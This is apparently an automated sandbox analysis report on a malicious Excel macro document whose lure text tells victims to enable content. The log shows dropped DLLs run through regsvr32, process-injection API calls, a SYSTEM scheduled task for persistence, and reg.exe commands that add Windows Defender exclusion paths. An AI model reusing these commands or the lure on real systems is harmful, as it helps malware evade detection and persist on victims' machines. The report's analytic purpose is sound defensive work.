    Source: Screenshot number: 4Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
    Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
    Source: Screenshot number: 4Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
    Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd2.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].datJump to dropped file
    PE file has nameless sectionsShow sources
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831424
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02834495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283B114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_028334DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831C5D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02834162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_028332EB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833073
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00094FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D82C41
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D8242A
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81424
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D83726
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D834DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81C5D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D83073
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D832EB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D84162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D8B114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D84495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00094FC0
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: Drezd.red.5.drStatic PE information: No import functions for PE file found
    Source: Drezd1.red.10.drStatic PE information: No import functions for PE file found
    Source: Drezd2.red.17.drStatic PE information: No import functions for PE file found
    Source: Drezd.red.15.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: Compensation-1730406737-09272021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................D.-..........&W.....(.P.............................U.................................................................-.....
    Source: C:\Windows\System32\reg.exeConsole Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD087.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/12@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Compensation-1730406737-09272021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push esi; mov dword ptr [esp], 00000001h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], ebx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push edi; mov dword ptr [esp], 00000004h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push edx; mov dword ptr [esp], 000FFFFFh
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name: .rdatat
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name: .rdatat
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
